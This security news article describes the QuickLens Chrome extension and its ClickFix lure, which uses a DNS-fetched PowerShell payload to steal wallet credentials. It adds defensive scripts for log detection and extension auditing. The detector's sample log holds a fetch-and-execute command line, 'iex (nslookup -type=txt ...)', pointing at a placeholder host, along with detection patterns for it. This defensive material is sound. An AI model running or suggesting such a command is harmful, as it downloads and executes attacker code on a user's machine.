Security researchers have identified a malicious Google Chrome extension named QuickLens that steals cryptocurrency credentials and other sensitive data. According to a report from Guardio Labs published on , the extension pairs fake browser-update alerts with the social-engineering technique known as "ClickFix" to trick users into running malicious code on their own machines.
The QuickLens extension, once installed, injects a fake "Google Update" pop-up banner onto every webpage the user visits. The alert never goes away, which creates a sense of urgency and leads users to believe their browser is out of date. One affected user reported: "That is appearing in every site I go, I thought it could be because Chrome wasn't updated, but even after updating it continues to appear."
When a user clicks the fake update button, the attack initiates.
ClickFix is a multi-stage social-engineering lure rather than a browser exploit: the victim is walked through the steps. After the user clicks the fake update, the extension deliberately crashes the tab or the entire browser. It then shows a fake error message with instructions to "fix" the problem by opening Windows PowerShell and pasting a command. That command uses the `nslookup` utility to retrieve a malicious PowerShell payload through a DNS query, so the script arrives via the system's DNS resolver instead of as an HTTP download that web filtering and antivirus software would normally inspect. Once executed, the payload compromises the user's system and harvests data, with cryptocurrency wallet credentials as the primary target.
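The DNS-retrieval step described above leaves a recognisable trace in endpoint telemetry: a PowerShell process launched from the desktop shell that spawns `nslookup.exe` asking for TXT records, with the output fed straight into an expression evaluator. The following detector is an added example written for this article, not code from the Guardio Labs report or from the QuickLens extension. The log lines are constructed to resemble Sysmon Event ID 1 (process creation) records exported as JSON; the field names are assumptions, and the domain in the sample is a placeholder, not real attacker infrastructure.

```python
"""Flag the ClickFix "nslookup into PowerShell" pattern in process-creation logs.

Added example, not from the Guardio Labs report. Event field names (Image,
ParentImage, CommandLine, ProcessId) mirror Sysmon Event ID 1 but are assumed.
"""
import json
import re

# -type=txt / -q=txt / -querytype=txt ask nslookup for TXT records, the record
# type large enough to carry script text; iex / Invoke-Expression runs whatever
# string comes back.
TXT_QUERY = re.compile(r"-(?:type|q|querytype)=txt", re.IGNORECASE)
EVAL_CALL = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []

    # nslookup itself: a TXT query spawned by a shell is the payload fetch.
    if image.endswith("nslookup.exe") and TXT_QUERY.search(cmd):
        reasons.append("nslookup TXT query")
        if parent.endswith(SHELLS):
            reasons.append("nslookup launched from a shell")

    # The shell the victim pasted into: nslookup output evaluated inline,
    # started from explorer.exe (Start menu / Run dialog), not from a script.
    if image.endswith(("powershell.exe", "pwsh.exe")):
        if "nslookup" in cmd.lower() and EVAL_CALL.search(cmd):
            reasons.append("powershell evaluates nslookup output")
        if parent.endswith("explorer.exe") and EVAL_CALL.search(cmd):
            reasons.append("interactive shell started with inline eval")

    return len(reasons), reasons


def scan(lines, threshold=2):
    """Return events whose indicator count reaches the threshold."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev.get("ProcessId"),
                         "image": ev.get("Image"),
                         "reasons": reasons})
    return hits


# Constructed sample log (not real telemetry). Lines 2 and 3 model the
# ClickFix sequence; lines 4 and 5 are benign look-alikes that must not fire.
SAMPLE_LOG = r'''
{"EventId":1,"ProcessId":4120,"Image":"C:\\Windows\\explorer.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","CommandLine":"C:\\Windows\\Explorer.EXE"}
{"EventId":1,"ProcessId":5208,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -NoProfile -Command \"iex (nslookup -type=txt fix.example.invalid)\""}
{"EventId":1,"ProcessId":5216,"Image":"C:\\Windows\\System32\\nslookup.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"nslookup -type=txt fix.example.invalid"}
{"EventId":1,"ProcessId":6002,"Image":"C:\\Windows\\System32\\nslookup.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"nslookup www.example.com"}
{"EventId":1,"ProcessId":6100,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -File C:\\Users\\alice\\backup.ps1"}
'''

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["pid"], hit["image"], "->", "; ".join(hit["reasons"]))
```

Requiring two indicators keeps an administrator's plain `nslookup` or a scheduled `-File` script out of the results; in a real deployment the same logic maps onto a SIEM rule keyed on the parent/child relationship, and the `-type=txt` match should be extended to whatever other DNS clients (such as `Resolve-DnsName`) the environment allows.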
The primary motivation behind the QuickLens extension and the ClickFix attack is financial theft. By gaining access to cryptocurrency wallets and other sensitive accounts, the attackers can drain funds and sell compromised data. The attack relies on social engineering, exploiting user trust in common browser notifications like update alerts and error messages to persuade them to perform actions they normally would not.
The immediate focus for security providers and Google will be to ensure the extension is removed from official channels and to identify other malware using the ClickFix technique. For affected users, the next steps are to remove the extension, treat the machine as compromised if the pasted command was run, and rotate the credentials and wallet keys that were exposed. The incident highlights the ongoing threat of malicious browser extensions that abuse user trust.
Users are advised to take several precautions to protect themselves from similar threats:
- Regularly review and remove any unnecessary or unfamiliar browser extensions.
- Be highly skeptical of unexpected pop-up alerts, especially those asking for immediate action.
- Never copy and paste commands from a website into a command-line interface like PowerShell or Terminal unless the source is completely trusted. No legitimate browser update or error message asks you to do this.
- Ensure your browser and operating system are kept up-to-date through official channels only.
- Use reputable antivirus and anti-malware software.
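Reviewing extensions by hand (the first precaution above) is easier with a ranking of what each one can reach. An extension that paints a banner onto every page, as QuickLens is described doing, needs a content script matching all sites, so that is the first thing to look for. The script below is an added example written for this article, not tooling from the report or from Google. It reads Chrome's extension manifests, which live under `<profile>/Extensions/<extension id>/<version>/manifest.json`; the manifests and extension IDs in the sample are constructed placeholders.

```python
"""Rank installed Chrome extensions by the breadth of their site access.

Added example, not from the Guardio Labs report. The sample manifests below
are constructed; the placeholder IDs are not real extensions.
"""
import json
from pathlib import Path

# Match patterns that grant a content script or host permission on every site.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Extensions installed from the Chrome Web Store carry this update_url;
# sideloaded, unpacked or policy-installed extensions usually do not.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"


def audit_manifest(ext_id, manifest):
    """Return the findings for one extension manifest (a dict)."""
    findings = []

    for cs in manifest.get("content_scripts", []):
        if BROAD_MATCHES & set(cs.get("matches", [])):
            findings.append("content script runs on every site")
            break

    # MV3 lists host access under host_permissions; MV2 mixed it into permissions.
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    if hosts & BROAD_MATCHES:
        findings.append("host permission covers every site")

    if manifest.get("update_url") != WEBSTORE_UPDATE_URL:
        findings.append("not updated from the Chrome Web Store")

    # Names may be localisation keys (__MSG_name__); the ID is the stable handle.
    return {"id": ext_id,
            "name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "findings": findings}


def rank(results):
    """Most findings first."""
    return sorted(results, key=lambda r: -len(r["findings"]))


def audit_directory(extensions_dir):
    """Walk <profile>/Extensions and audit every manifest found."""
    results = []
    for manifest_path in Path(extensions_dir).glob("*/*/manifest.json"):
        ext_id = manifest_path.parent.parent.name
        with open(manifest_path, encoding="utf-8") as f:
            results.append(audit_manifest(ext_id, json.load(f)))
    return rank(results)


# Constructed manifests: one that behaves like the banner injector described in
# the article, one narrowly scoped Web Store extension.
SAMPLE_MANIFESTS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "name": "Page Lens", "version": "1.4", "manifest_version": 3,
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
        "host_permissions": ["<all_urls>"],
        "permissions": ["storage", "tabs"],
    },
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "name": "Docs Helper", "version": "2.0", "manifest_version": 3,
        "content_scripts": [{"matches": ["https://docs.example.com/*"], "js": ["docs.js"]}],
        "update_url": WEBSTORE_UPDATE_URL,
    },
}


def audit_samples():
    return rank(audit_manifest(i, m) for i, m in SAMPLE_MANIFESTS.items())


if __name__ == "__main__":
    for r in audit_samples():
        print(r["id"], r["name"], r["version"], r["findings"] or "ok")
```

Run `audit_directory()` against the profile's `Extensions` folder (on Windows, under `%LOCALAPPDATA%\Google\Chrome\User Data\Default`) and read the top of the list: broad site access is legitimate for some tools such as password managers and ad blockers, so the output is a prioritised review queue, not a verdict. The missing Web Store `update_url` finding also fires for unpacked developer extensions and enterprise policy installs, which is exactly the set that deserves a second look.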